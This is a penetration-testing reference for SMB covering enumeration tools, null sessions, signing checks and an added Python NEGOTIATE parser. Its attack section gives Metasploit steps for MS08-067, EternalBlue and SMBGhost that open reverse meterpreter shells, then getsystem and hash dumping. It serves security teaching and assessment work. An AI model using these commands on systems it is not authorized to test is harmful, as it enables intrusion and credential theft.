
SMB (Server Message Block)

Default Port: 139, 445

SMB (Server Message Block), also known as CIFS (Common Internet File System), is a network protocol that allows for file sharing, network browsing, printing services, and inter-process communication over a network.

The protocol lets a client access resources (shares, printers, named pipes) exposed by a server.

Connect

Start by establishing a connection to the Server Message Block (SMB) server.

To list all available shares on the target server, utilize the following command:

smbclient -L //target-ip

Recon

Network Scanning for SMB Services

Identify devices running SMB services within a target network.

# Nmap to discover SMB services
nmap -p 445 --open -sV <target-ip>

Identify SMB Version

Determine which SMB versions are running on target systems.

# Nmap script for SMB version
nmap --script smb-protocols -p 445 <target-ip>

Enumeration

For further enumeration, various tools such as enum4linux, smbmap, or the nmap scripting engine can be employed.

smbclient

Using smbclient to list shares

smbclient -L //192.168.1.100 -U anonymous

enum4linux

Using enum4linux for enumeration

enum4linux -a target-ip

smbmap

smbmap -H target-ip

nmap

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse target-ip

This command executes two scripts to enumerate shares and users from the target server.

Attack Vectors

This section covers common attack vectors encountered when assessing Server Message Block (SMB) services.

SMB Null Session

A Null Session refers to an unauthenticated connection to an SMB server, providing the capability to gather significant information. Exploitation typically involves SMB connections over TCP ports 445 and 139.

Command to establish a Null Session connection:

rpcclient -U "" -N <target-ip>

SMB Signing

If SMB signing is not required, messages between client and server are not authenticated, so an attacker positioned on the network path can tamper with or relay the session (a man-in-the-middle attack).

To check for SMB Signing status:

nmap --script smb-security-mode.nse -p445 <target-ip>
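As an added example that is not part of the original page, the following Python helper decodes the SMB NEGOTIATE response itself (SMB1 and SMB2/3, so it also covers the dialect check from the Identify SMB Version section) and reports whether signing is merely enabled or actually required, the same property the smb-security-mode script inspects. The function and sample names are assumptions, and the sample responses are constructed bytes rather than captures.

```python
import struct

SMB2_DIALECTS = {0x0202: "SMB 2.0.2", 0x0210: "SMB 2.1", 0x0300: "SMB 3.0",
                 0x0302: "SMB 3.0.2", 0x0311: "SMB 3.1.1"}

def parse_negotiate(resp: bytes) -> dict:
    """Decode an SMB1 or SMB2/3 NEGOTIATE response (bytes after the NetBIOS
    session header) into its dialect and message-signing flags."""
    if resp[:4] == b"\xfeSMB":                         # SMB2/3: 64-byte header
        if struct.unpack_from("<H", resp, 12)[0] != 0:  # Command 0 = NEGOTIATE
            raise ValueError("not an SMB2 NEGOTIATE response")
        # Body starts: StructureSize(2) SecurityMode(2) DialectRevision(2)
        _, sec_mode, dialect = struct.unpack_from("<HHH", resp, 64)
        enabled, required = bool(sec_mode & 0x1), bool(sec_mode & 0x2)
        name = SMB2_DIALECTS.get(dialect, f"unknown SMB2 dialect 0x{dialect:04x}")
    elif resp[:4] == b"\xffSMB":                       # SMB1: 32-byte header
        if resp[4] != 0x72:                            # SMB_COM_NEGOTIATE
            raise ValueError("not an SMB1 NEGOTIATE response")
        # Params: WordCount(1) DialectIndex(2) SecurityMode(1): bit 2 = signing enabled, bit 3 = required
        sec_mode = resp[32 + 3]
        enabled, required = bool(sec_mode & 0x4), bool(sec_mode & 0x8)
        name = "SMB1 (NT LM 0.12)"
    else:
        raise ValueError("not an SMB response")
    return {"dialect": name, "signing_enabled": enabled, "signing_required": required}

def signing_finding(resp: bytes) -> str:
    # One-line verdict comparable to what nmap's smb-security-mode reports.
    info = parse_negotiate(resp)
    if info["signing_required"]:
        verdict = "OK: message signing required"
    elif info["signing_enabled"]:
        verdict = "WEAK: signing enabled but not required (relay/MitM exposure)"
    else:
        verdict = "WEAK: message signing disabled"
    return f"{info['dialect']}: {verdict}"

# Constructed sample responses for offline use (not captured from a real host).
def sample_smb2_negotiate(sec_mode: int, dialect: int) -> bytes:
    hdr = (b"\xfeSMB" + struct.pack("<HHIHHIIQIIQ", 64, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0)
           + b"\0" * 16)                               # 16-byte Signature field
    return hdr + struct.pack("<HHH", 65, sec_mode, dialect) + b"\0" * 59

def sample_smb1_negotiate(sec_mode: int) -> bytes:
    hdr = b"\xffSMB" + bytes([0x72]) + b"\0" * 27      # Command byte + rest of header
    return hdr + bytes([17]) + struct.pack("<H", 0) + bytes([sec_mode]) + b"\0" * 30

if __name__ == "__main__":
    for r in (sample_smb2_negotiate(0x3, 0x0311), sample_smb2_negotiate(0x1, 0x0210),
              sample_smb1_negotiate(0x07)):
        print(signing_finding(r))
```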

MS08-067 (Netapi)

This vulnerability permits remote attackers to execute arbitrary code through a crafted RPC request.

Metasploit module for exploitation:

use exploit/windows/smb/ms08_067_netapi
set RHOSTS <TARGET-IP>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
exploit

MS17-010 (EternalBlue)

This vulnerability enables remote attackers to execute arbitrary code via a crafted SMBv1 request.

Metasploit module for exploitation:

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <TARGET-IP>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
exploit

SMBGhost (CVE-2020-0796)

Metasploit module for the SMBGhost vulnerability in SMBv3:

use exploit/windows/smb/cve_2020_0796_smbghost
set RHOSTS <TARGET-IP>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
exploit

Post-Exploitation

After successful exploitation, the post-exploitation phase begins: gathering further information from and about the compromised host.

Gaining System Access

From the Meterpreter session, attempt to escalate privileges to SYSTEM:

getsystem

Dumping Hashes

A Metasploit post-module can be employed to dump hashes.

use post/windows/gather/smart_hashdump
set SESSION <session-id>
run

Common SMB Commands

Command       | Description                               | Usage
--------------|-------------------------------------------|----------------------------------------
smbclient     | Connect to an SMB/CIFS server             | smbclient //server/share
smbget        | Download files from an SMB/CIFS server    | smbget smb://server/share/file
smbpasswd     | Change a user's SMB password              | smbpasswd -r server -U username
smbstatus     | Display information about SMB connections | smbstatus
smbtree       | List SMB/CIFS shares on a network         | smbtree
mount -t cifs | Mount an SMB/CIFS share                   | mount -t cifs //server/share /mnt/point
umount        | Unmount an SMB/CIFS share                 | umount /mnt/point